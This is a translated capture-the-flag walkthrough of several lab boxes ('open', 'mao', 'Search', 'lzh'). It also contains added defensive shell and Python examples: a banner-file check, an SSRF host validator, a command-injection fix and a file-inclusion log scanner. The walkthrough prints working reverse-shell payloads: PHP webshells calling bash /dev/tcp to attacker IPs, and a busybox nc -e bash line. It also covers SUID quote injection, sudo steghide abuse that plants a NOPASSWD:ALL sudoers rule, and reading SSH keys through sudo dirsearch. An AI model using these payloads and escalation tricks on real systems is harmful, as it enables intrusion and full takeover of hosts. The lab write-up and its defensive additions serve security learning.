ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.247.102.175' (ECDSA) to the list of known hosts.
flag{root-a46ec67a0f2e7c387926ac5d783ea4b8}
ssh-banner@10.247.102.175's password:
Connection closed by 10.247.102.175 port 22
Got root.txt
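What made this work is that sshd reads the Banner file as root before authentication and sends it to every client, so a banner path that an unprivileged user can replace with a symlink leaks whatever it points at. Added example, not from the writeup: a check that pulls the Banner path from sshd_config and verifies the file is a regular non-symlink file, owned by the expected user, and not writable by group or others. The sshd_config fragment and the banner files below are constructed for the demo; the expected owner is a parameter because the demo files are owned by whoever runs it, while on a real host it should be root.

```shell
# Added example: verify sshd's Banner file cannot be swapped by a low-priv user.

# Print the Banner path from an sshd_config-style file ($1), empty if unset.
get_banner_path() {
    sed -n 's/^[[:space:]]*[Bb]anner[[:space:]]\{1,\}//p' "$1" | head -n 1
}

# Check that $1 is a regular, non-symlink file owned by $2 (default root)
# and not writable by group or others. Prints a verdict, returns 1 on FAIL.
check_banner_file() {
    f=$1
    want_owner=${2:-root}
    if [ -L "$f" ]; then
        echo "FAIL: $f is a symlink -> $(readlink "$f")"; return 1
    fi
    if [ ! -f "$f" ]; then
        echo "FAIL: $f is not a regular file"; return 1
    fi
    owner=$(stat -c '%U' "$f")
    mode=$(stat -c '%a' "$f")
    if [ "$owner" != "$want_owner" ]; then
        echo "FAIL: $f is owned by $owner, expected $want_owner"; return 1
    fi
    # last two octal digits are group and other; 2,3,6,7 carry the write bit
    case $mode in
        *[2367][0-7]|*[2367])
            echo "FAIL: $f mode $mode is group/other-writable"; return 1 ;;
    esac
    echo "OK: $f"
}

# Constructed demo: a config pointing at the path seen on this box, plus a
# sane banner, a world-writable one (as on the box) and a symlinked one.
DEMO=$(mktemp -d)
ME=$(id -un)
printf 'Port 22\nBanner /home/ssh-banner/banner.txt\n' > "$DEMO/sshd_config"
printf 'Authorized access only\n' > "$DEMO/good.txt"; chmod 644 "$DEMO/good.txt"
printf 'Authorized access only\n' > "$DEMO/bad.txt";  chmod 666 "$DEMO/bad.txt"
ln -s "$DEMO/good.txt" "$DEMO/link.txt"

echo "Banner path: $(get_banner_path "$DEMO/sshd_config")"
check_banner_file "$DEMO/good.txt" "$ME"
check_banner_file "$DEMO/bad.txt" "$ME" || true
check_banner_file "$DEMO/link.txt" "$ME" || true
```

On the box, banner.txt was mode 777 and lived in a home directory the ssh-banner user owns, so the owner check would pass (root) but the mode check fails, and after the ln -sf the symlink check fails; either finding is enough to stop sshd from serving that path.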

open

user

Open the site; same as above, add

10.247.102.236 open.dsz   (a bit more stable)

Then there's a spot where SSRF is possible, but the URL must start with http://open; here I borrow hyh 大神's explanation

https://username:password@subdomain.example.com:8080/path/to/resource.html?key1=value1&key2=value2#section2
Breakdown:
scheme: https
username: username
password: password
host (domain/IP): subdomain.example.com
port: 8080
path: /path/to/resource.html
query string: ?key1=value1&key2=value2
fragment: #section2
So it follows that open can be used as the username and the IP can then be controlled by us, bypassing the check. Remote file inclusion is used here
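The filter failed because it checked a string prefix, while the fetcher resolved the host from the authority part of the URL. Added example, not the site's code: a POSIX shell URL host extractor built from the breakdown above, a prefix check reproducing the weak rule, and a host check that compares the parsed hostname with an allow list. ALLOWED_HOST is an assumption taken from the hosts entry used on this box.

```shell
# Added example: validate an SSRF target by parsed host, not by string prefix.
ALLOWED_HOST="open.dsz"   # assumed: the only host the site should fetch from

# Extract the host from a URL: strip scheme, keep the authority, drop
# userinfo and port. IPv6 literals in brackets are not handled here.
url_host() {
    rest=${1#*://}           # scheme://  ->  authority/path?query#fragment
    rest=${rest%%/*}         # keep authority (userinfo@host:port)
    rest=${rest%%"?"*}       # authority may end at a query if no path
    rest=${rest%%#*}         # or at a fragment
    rest=${rest##*@}         # drop userinfo (this is what "open@" abused)
    host=${rest%%:*}         # drop port
    printf '%s\n' "$host"
}

# Weak rule from the site: accepts anything beginning with http://open.
prefix_check() {
    case $1 in
        http://open*) return 0 ;;
    esac
    return 1
}

# Fixed rule: scheme must be http(s) and the parsed host must match exactly.
url_allowed() {
    case $1 in
        http://*|https://*) ;;
        *) return 1 ;;
    esac
    [ "$(url_host "$1")" = "$ALLOWED_HOST" ]
}

# Constructed inputs: the breakdown example, the bypass shape, and a legit URL.
for u in "https://username:password@subdomain.example.com:8080/path/to/resource.html?key1=value1&key2=value2#section2" \
         "http://open@10.247.102.219:8080/shell.php" \
         "http://open.dsz/index.php"; do
    if url_allowed "$u"; then v=allowed; else v=rejected; fi
    echo "host=$(url_host "$u") prefix_ok=$(prefix_check "$u" && echo yes || echo no) -> $v"
done
```

The bypass URL passes prefix_check but is rejected by url_allowed, because "open" is parsed as the userinfo and the host is the attacker-controlled IP. A production fetcher should additionally resolve the host and refuse loopback, link-local and RFC 1918 addresses, since a DNS name on the allow list can still point anywhere.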

Do remote file inclusion directly; write shell.php on kali

Its content is <?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.247.102.219/2332 0>&1'")?>
┌──(root㉿kali2025)-[/home/wea5e1]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.247.102.236 - - [01/Dec/2025 19:07:58] "GET /shell.php HTTP/1.1" 200 -

root

└─# nc -lvvp 2332
listening on [any] 2332 ...
connect to [10.247.102.219] from open.dsz [10.247.102.236] 57214
bash: cannot set terminal process group (418): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Open:/var/www/open.dsz$ ls
/usr/bin/script -qc /bin/bash /dev/null   // stabilize the shell
www-data@Open:/home/miao$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/echo

There's an echo here

/opt/echo "1"   
/opt/echo "1"
执行命令: echo '[用户输入]: 1'
[用户输入]: 1
www-data@Open:/home/miao$ /opt/echo "1'"
/opt/echo "1'"
执行命令: echo '[用户输入]: 1''
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:/home/miao$ /opt/echo "1';id"
/opt/echo "1';id"
执行命令: echo '[用户输入]: 1';id'
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:/home/miao$ /opt/echo "123';id'"
/opt/echo "123';id'"
执行命令: echo '[用户输入]: 123';id''
[用户输入]: 123
uid=1000(miao) gid=1000(miao) groups=1000(miao),33(www-data)
Found that a ' can be used to break out and execute commands
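The output above tells the whole story: /opt/echo builds the string echo '[用户输入]: INPUT' and hands it to sh, so a quote in the input ends the literal and the rest is parsed as shell syntax. Added example, not the /opt/echo binary from the box: the weak pattern reproduced in shell next to two fixed versions, one that avoids a child shell altogether and one that passes the input as a positional parameter when a child shell is unavoidable. The inputs are the ones from the transcript.

```shell
# Added example: command injection via string interpolation, and the fix.

# Weak: $1 is spliced into the command text, so a quote in the input ends the
# single-quoted string and whatever follows is parsed as shell code.
weak_echo() {
    sh -c "echo '[user input]: $1'"
}

# Fixed: no shell is involved; the input is an ordinary argument to printf
# and %s prints it byte for byte.
safe_echo() {
    printf '[user input]: %s\n' "$1"
}

# Fixed when a child shell is genuinely required: the command text is a
# constant and the input travels as $1, which the child never parses.
safe_echo_sh() {
    sh -c 'printf "[user input]: %s\n" "$1"' sh "$1"
}

safe_echo "1"
safe_echo "123';id'"       # quotes come out literally, nothing else runs
safe_echo_sh "123';id'"
weak_echo "it's" || echo "weak_echo: an apostrophe alone already breaks it"
```

The same rule applies to the SUID wrapper on the box: a setuid program that must run a command should use execve with an argument vector, never system() with a formatted string.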

mao

user

Information gathering

nmap -sV -T4 10.247.102.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 22:54 CST
Nmap scan report for 10.247.102.83
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http   Apache httpd 2.4.62 ((Debian))
Run dirsearch
[22:56:24] 302 -   0B - /dashboard.php -> index.php                    
[22:56:27] 200 -   66B - /home.php                                        
[22:56:29] 302 -   0B - /logout.php -> index.php
[22:56:35] 200 - 198B - /settings.php                                    
[22:56:36] 200 - 323B - /stats.php                                        

Look at port 80; it's a login page, and admin gives a wrong password, so brute-force it

admin/pinkgir1
Logged in, clicking around
http://10.247.102.83/dashboard.php?page=home.php
???
File inclusion
http://10.247.102.83/dashboard.php?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
lingmj:x:1000:1000:,,,:/home/lingmj:/bin/bash
oneoneone:x:1001:1001:,,,:/home/oneoneone:/bin/bash
todd:x:1002:1002:,,,:/home/todd:/bin/bash

So we get three users: lingmj, oneoneone (uid 1001) and todd.
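Seen from the defender's side, the dashboard.php?page=/etc/passwd request above is the signature of a local/remote file inclusion and is easy to catch in the web server's access log. The following is an added example, not code from this write-up or the box: a small Python scanner run over constructed Apache-style log lines modelled on the requests above, plus the allowlist check the include handler should have applied (the allowed page names are the ones dirsearch found; the parameter names and log format are assumptions).

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache-style access log lines modelled on the dashboard.php?page=
# requests in this write-up. Sample data only, not a log captured from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2025:22:58:01 +0800] "GET /dashboard.php?page=home.php HTTP/1.1" 200 66
10.0.0.5 - - [08/Dec/2025:22:58:09 +0800] "GET /dashboard.php?page=/etc/passwd HTTP/1.1" 200 2411
10.0.0.5 - - [08/Dec/2025:22:58:15 +0800] "GET /dashboard.php?page=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0
10.0.0.5 - - [08/Dec/2025:22:58:21 +0800] "GET /dashboard.php?page=http://10.0.0.9:8000/x.txt HTTP/1.1" 200 0
10.0.0.5 - - [08/Dec/2025:22:58:30 +0800] "GET /stats.php HTTP/1.1" 200 323
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Parameter names that commonly feed include()/require(); extend as needed (assumed list).
INCLUDE_PARAMS = {"page", "file", "include", "template", "view", "path"}
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)   # http://, php://, data:, expect:
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")               # C:\ style absolute path
# Pages dashboard.php may legitimately include: the ones dirsearch found above.
ALLOWED_PAGES = {"home.php", "settings.php", "stats.php"}


def classify_include_value(value):
    """Return why an include-parameter value looks malicious, or None if it does not."""
    v = unquote(value)      # parse_qsl decoded once already; this catches double encoding
    if "\x00" in v:
        return "null byte"
    if v.startswith(("/", "\\")) or DRIVE_RE.match(v):
        return "absolute path"
    if SCHEME_RE.match(v):
        return "remote URL or stream wrapper (RFI)"
    if "../" in v or "..\\" in v:
        return "directory traversal"
    return None


def scan_access_log(text):
    """Parse access-log lines and flag include-style parameters carrying LFI/RFI payloads."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() not in INCLUDE_PARAMS:
                continue
            reason = classify_include_value(value)
            if reason:
                alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                               "param": name, "value": value, "reason": reason,
                               "status": int(m.group("status"))})
    return alerts


def safe_include_target(value, allowed=ALLOWED_PAGES):
    """The application-side fix: accept only a bare, allow-listed file name.

    Returns the name to include or None when the request must be rejected. An
    exact-match lookup leaves no room for traversal, wrappers or absolute paths.
    """
    return value if value in allowed else None


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print("%(time)s %(ip)s %(param)s=%(value)s -> %(reason)s (HTTP %(status)d)" % a)
```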

Brute-forcing gives lingmj's password: babyface.

ssh lingmj@10.247.102.83
lingmj@Mao:~$ 

root

lingmj@Mao:/$ sudo -l
Matching Defaults entries for lingmj on Mao:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lingmj may run the following commands on Mao:
  (ALL) NOPASSWD: /usr/bin/steghide
lingmj@Mao:/$

Anyone who has done MISC challenges knows this is a steganography tool that merges one file into another. Following the write-ups from the QQ group, there are five methods in total.

1

Embed root.txt directly.

First open a port with Python's HTTP server so the target can fetch a file from Kali, then pull a picture onto the target.

On Kali (local)

python3 -m http.server 8000                        
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.247.102.83 - - [08/Dec/2025 23:18:37] "GET /A033.jpg HTTP/1.1" 200 -
----------------------------------------

shell

lingmj@Mao:/$ cd /tmp
lingmj@Mao:/tmp$ busybox wget http://10.247.102.219:8000/A033.jpg
Connecting to 10.247.102.219:8000 (10.247.102.219:8000)
A033.jpg             100% |*****************************| 1604k 0:00:00 ETA
lingmj@Mao:/tmp$
lingmj@Mao:/tmp$ sudo /usr/bin/steghide embed -ef /root/root.txt -cf ./1.jpg
Enter passphrase:
Re-Enter passphrase:
embedding "/root/root.txt" in "./1.jpg"... done
lingmj@Mao:/tmp$ /usr/bin/steghide extract -sf ./1.jpg
Enter passphrase:
wrote extracted data to "root.txt".
lingmj@Mao:/tmp$ ls
1.jpg
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:/tmp$ cat root.txt
flag{root-5ad6f10629504ec51038b8c14a1fb9c6}
lingmj@Mao:/tmp$
Root obtained.

2

Grant lingmj passwordless full sudo (this approach was provided by the group lead).

Create a malicious sudoers file whose content grants lingmj the right to run every sudo command without a password.

echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a

Use the steganography tool to drop it into the privileged directory /etc/sudoers.d.

lingmj@Mao:/tmp$ echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a
lingmj@Mao:/tmp$ ls
1.jpg
a
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:/tmp$ steghide embed -cf 1.jpg -ef a
Enter passphrase:
Re-Enter passphrase:
embedding "a" in "1.jpg"... done
lingmj@Mao:/tmp$ cd /etc/sudoers.d
lingmj@Mao:/etc/sudoers.d$ /etc/sudoers.d$ ls -al
-bash: /etc/sudoers.d$: No such file or directory
lingmj@Mao:/etc/sudoers.d$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Apr 4 2025 .
drwxr-xr-x 82 root root 4096 Dec 8 09:52 ..
-r--r----- 1 root root 958 Jan 14 2023 README
lingmj@Mao:/etc/sudoers.d$ sudo steghide extract -sf /tmp/1.jpg
Enter passphrase:
wrote extracted data to "a".
lingmj@Mao:/etc/sudoers.d$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Dec 8 10:36 .
drwxr-xr-x 82 root root 4096 Dec 8 09:52 ..
-rw-r--r-- 1 root root   34 Dec 8 10:36 a
-r--r----- 1 root root 958 Jan 14 2023 README
lingmj@Mao:/etc/sudoers.d$ cat a
lingmj ALL=(ALL:ALL) NOPASSWD:ALL
lingmj@Mao:/etc/sudoers.d$ sudo -l
Matching Defaults entries for lingmj on Mao:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lingmj may run the following commands on Mao:
  (ALL) NOPASSWD: /usr/bin/steghide
  (ALL : ALL) NOPASSWD: ALL
lingmj@Mao:/etc/sudoers.d$ id
uid=1000(lingmj) gid=1000(lingmj) groups=1000(lingmj)
lingmj@Mao:/etc/sudoers.d$ sudo -i
root@Mao:~# id
uid=0(root) gid=0(root) groups=0(root)
  1. lingmj@Mao:~$ steghide embed -cf 1.jpg -ef a
     Use steghide to embed the file a (the file to hide) into the carrier image 1.jpg.
  2. Enter passphrase:
     Prompt for a passphrase (it encrypts the hidden file a; the same passphrase is needed to extract it later).
  3. Re-Enter passphrase:
     Enter the passphrase again to confirm the two match.
  4. embedding "a" in "1.jpg"... done
     Completion message: file a has been embedded into 1.jpg.
  5. lingmj@Mao:~$ cd /etc/sudoers.d
     Change into /etc/sudoers.d (the directory holding sudo rule files; only root can write there).
  6. lingmj@Mao:/etc/sudoers.d$ ls -al
     List every file in the directory (hidden files included) with full permission details; at this point only README is present.
  7. lingmj@Mao:/etc/sudoers.d$ sudo steghide extract -sf ~/1.jpg
     With root privileges (sudo), extract the hidden file from ~/1.jpg (the image that file a was embedded in); -sf names the stego file.
  8. Enter passphrase:
     Prompt for the passphrase set during embedding (used to decrypt and extract file a).
  9. wrote extracted data to "a".
     Completion message: the hidden file a has been written to the current directory (/etc/sudoers.d).
  10. lingmj@Mao:/etc/sudoers.d$ ls -al
      List the directory again; the extracted file a is now present (permissions -rw-r--r--, created by root).
  11. lingmj@Mao:/etc/sudoers.d$ cat a
      Show the contents of a: a sudo rule allowing user lingmj to run every command without a password.
  12. lingmj@Mao:/etc/sudoers.d$ sudo -l
      Verify lingmj's sudo privileges: alongside the original /usr/bin/steghide entry, the output now also lists the NOPASSWD: ALL rule from file a.

The core of the whole chain: hide the sudo rule file a inside a picture with steganography, then extract it (as root) into /etc/sudoers.d, which rewrites the user's privileges.

3

111's method

To be filled in later, sigh.

Box replay: Search

user

Start the box and run the usual trio: nmap, dirsearch and gobuster dir.

nmap shows ports 22 and 80.

gobuster dir -u http://10.247.102.224 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.247.102.224
[+] Method:                 GET
[+] Threads:                 10
[+] Wordlist:               /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:             gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess           (Status: 403) [Size: 279]
/.htpasswd           (Status: 403) [Size: 279]
/admin               (Status: 301) [Size: 316] [--> http://10.247.102.224/admin/]                                                                        
/api                 (Status: 301) [Size: 314] [--> http://10.247.102.224/api/]                                                                          
/assets               (Status: 301) [Size: 317] [--> http://10.247.102.224/assets/]                                                                      
/favicon.ico         (Status: 200) [Size: 4286]
/index               (Status: 200) [Size: 80683]
/index.php           (Status: 200) [Size: 80676]
/Java                 (Status: 200) [Size: 64546]
/javascript           (Status: 200) [Size: 62969]
/java                 (Status: 200) [Size: 64546]
/php                 (Status: 200) [Size: 58255]
/PHP                 (Status: 200) [Size: 58255]
/robots.txt           (Status: 200) [Size: 25]
/server-status       (Status: 403) [Size: 279]
/static               (Status: 301) [Size: 317] [--> http://10.247.102.224/static/]                                                                      
/uploads             (Status: 301) [Size: 318] [--> http://10.247.102.224/uploads/]                                                                      
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished

I won't show the dirsearch output.

setup.txt contains a username and password. After logging in it turns out to be Feehi CMS; a bit of research shows which vulnerabilities it may have.

There is a file upload vulnerability in the ad management section: upload a webshell there and get a reverse shell into the box.

------WebKitFormBoundaryAqHilH6RnHBZLCys

Content-Disposition: form-data; name="AdForm[ad]"; filename="A033.php"

Content-Type: image/jpeg
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/kali/7777 0>&1'");?>
www-data@Search:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on Search:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Search:
(7r1umphk) NOPASSWD: /usr/local/bin/dirsearch
www-data@Search:/home$

Reverse shell obtained.

Then sudo -l to see how to escalate: it is dirsearch, the directory scanner.

www-data@Search:/tmp$ sudo -u 7r1umphk dirsearch -u http://127.0.0.1
sudo -u 7r1umphk dirsearch -u http://127.0.0.1

_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /tmp/reports/http_127.0.0.1/_25-12-09_08-44-56.txt

Target: http://127.0.0.1/

[08:44:56] Starting:
[ ] 0%
Nothing special.
/usr/local/bin/dirsearch -h
Usage: dirsearch [-u|--url] target [-e|--extensions] extensions [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit

Mandatory:
-u URL, --url=URL Target URL(s), can use multiple flags
-l PATH, --url-file=PATH
URL list file
--stdin Read URL(s) from STDIN
--cidr=CIDR Target CIDR
--raw=PATH Load raw HTTP request from file (use `--scheme` flag
to set the scheme)
-s SESSION_FILE, --session=SESSION_FILE
Session file
--config=PATH Full path to config file, see 'config.ini' for example
(Default: config.ini)

Dictionary Settings:
-w WORDLISTS, --wordlists=WORDLISTS
Customize wordlists (separated by commas)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (e.g. php,asp)
-f, --force-extensions
Add extensions to the end of every wordlist entry. By
default dirsearch only replaces the %EXT% keyword with
extensions
-O, --overwrite-extensions
Overwrite other extensions in the wordlist with your
extensions (selected via `-e`)
--exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (e.g.
asp,jsp)
--remove-extensions
Remove extensions in all paths (e.g. admin.php ->
admin)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist

General Settings:
-t THREADS, --threads=THREADS
Number of threads
-r, --recursive Brute-force recursively
--deep-recursive Perform recursive scan on every directory depth (e.g.
api/users -> api/)
--force-recursive Do recursive brute-force for every found path, not
only directories
-R DEPTH, --max-recursion-depth=DEPTH
Maximum recursion depth
--recursion-status=CODES
Valid status codes to perform recursive scan, support
ranges (separated by commas)
--subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by
commas)
--exclude-subdirs=SUBDIRS
Exclude the following subdirectories during recursive
scan (separated by commas)
-i CODES, --include-status=CODES
Include status codes, separated by commas, support
ranges (e.g. 200,300-399)
-x CODES, --exclude-status=CODES
Exclude status codes, separated by commas, support
ranges (e.g. 301,500-599)
--exclude-sizes=SIZES
Exclude responses by sizes, separated by commas (e.g.
0B,4KB)
--exclude-text=TEXTS
Exclude responses by text, can use multiple flags
--exclude-regex=REGEX
Exclude responses by regular expression
--exclude-redirect=STRING
Exclude responses if this regex (or text) matches
redirect URL (e.g. '/index.html')
--exclude-response=PATH
Exclude responses similar to response of this page,
path as input (e.g. 404.html)
--skip-on-status=CODES
Skip target whenever hit one of these status codes,
separated by commas, support ranges
--min-response-size=LENGTH
Minimum response length
--max-response-size=LENGTH
Maximum response length
--max-time=SECONDS Maximum runtime for the scan
--exit-on-error Exit whenever an error occurs

Request Settings:
-m METHOD, --http-method=METHOD
HTTP method (default: GET)
-d DATA, --data=DATA
HTTP request data
--data-file=PATH File contains HTTP request data
-H HEADERS, --header=HEADERS
HTTP request header, can use multiple flags
--header-file=PATH File contains HTTP request headers
-F, --follow-redirects
Follow HTTP redirects
--random-agent Choose a random User-Agent for each request
--auth=CREDENTIAL Authentication credential (e.g. user:password or
bearer token)
--auth-type=TYPE Authentication type (basic, digest, bearer, ntlm, jwt,
oauth2)
--cert-file=PATH File contains client-side certificate
--key-file=PATH File contains client-side certificate private key
(unencrypted)
--user-agent=USER_AGENT
--cookie=COOKIE

Connection Settings:
--timeout=TIMEOUT Connection timeout
--delay=DELAY Delay between requests
--proxy=PROXY Proxy URL (HTTP/SOCKS), can use multiple flags
--proxy-file=PATH File contains proxy servers
--proxy-auth=CREDENTIAL
Proxy authentication credential
--replay-proxy=PROXY
Proxy to replay with found paths
--tor Use Tor network as proxy
--scheme=SCHEME Scheme for raw request or if there is no scheme in the
URL (Default: auto-detect)
--max-rate=RATE Max requests per second
--retries=RETRIES Number of retries for failed requests
--ip=IP Server IP address

Advanced Settings:
--crawl Crawl for new paths in responses

View Settings:
--full-url Full URLs in the output (enabled automatically in
quiet mode)
--redirects-history
Show redirects history
--no-color No colored output
-q, --quiet-mode Quiet mode

Output Settings:
-o PATH, --output=PATH
Output file
--format=FORMAT Report format (Available: simple, plain, json, xml,
md, csv, html, sqlite)
--log=PATH Log file
www-data@Search:/tmp$

Read the help.

--log=PATH is a common command-line option: it saves the tool's runtime log (operations, status, errors) to the file at the given PATH.
sudo -u 7r1umphk dirsearch -u http://127.0.0.1 -w /home/7r1umphk/user.txt --log=/tmp/1.txt

First use the sudo rule to run briefly as the higher-privileged user, then pass a file path through the wordlist option; the tool echoes the file's contents back (each line is tried as a path and shows up in the log), which is how user.txt is read.

2025-12-09 08:55:13,129 [INFO] "GET http://127.0.0.1/flag{user-681db772f6844d4c84da083c3d280954}" 404 - 33003B
www-data@Search:/tmp$
User flag obtained.

user.txt can be read this way; let's see whether the SSH key can be grabbed too. It should be possible.

sudo -u 7r1umphk /usr/local/bin/dirsearch -l /home/7r1umphk/.ssh/id_ed25519

root

Box replay: lzh

user

Start the box, scan with nmap, then enumerate directories with dirsearch or gobuster dir.

Ports are 22 and 80.
The directory scan turns up backup.zip.

It reveals that the site runs the moziloCMS framework.

Then search for its version and known vulnerabilities: MoziloCMS 3.0 – Remote Code Execution (RCE) – PHP webapps Exploit.

In short: get into the admin panel, upload a file, and execute PHP code.

Brute-force the username and password.

admin/Admin123

Then upload through the file manager. At first it will not parse PHP files, so upload a .txt first and then rename it.

<?php
exec("busybox nc 10.247.102.219 4444 -e bash")?>

Reverse shell obtained. Looking under /home reveals the user welcome.

努力哥's write-up notes that credentials usually live in configuration files, or you can simply grep for anything mentioning the user:
www-data@Lzh:/var/www/html/mozilo/admin$ grep -rin "welcome" --include="*.php" ./
<ilo/admin$ grep -rin "welcome" --include="*.php" ./
./config.php:107: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
Login succeeded.

root

Checked sudo and find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null: there is no sudo.

welcome@Lzh:~$ ls -al
total 28
drwx------ 2 welcome welcome 4096 Apr 12 2025 .
drwxr-xr-x 3 root root 4096 Apr 11 2025 ..
lrwxrwxrwx 1 root root 9 Apr 11 2025 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome 220 Apr 11 2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11 2025 .bashrc
-rw-r--r-- 1 root root 2590 Apr 12 2025 id_rsa
-rw-r--r-- 1 welcome welcome 807 Apr 11 2025 .profile
-rw-r--r-- 1 welcome welcome 44 Apr 12 2025 user.txt
lrwxrwxrwx 1 root root 9 Apr 12 2025 .viminfo -> /dev/null

There is an RSA key file; try it directly.

welcome@Lzh:~$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Load key "id_rsa": invalid format
Invalid format.
welcome@Lzh:~$ cat id*
-----BEGIN OPENSSH PRIVATE KEY-----
???lbnNz

The first three characters are ?. A little research (asking an AI gets it) shows they should be b3B. Copy the file to /tmp, chmod 600 it, and fix it with vim.

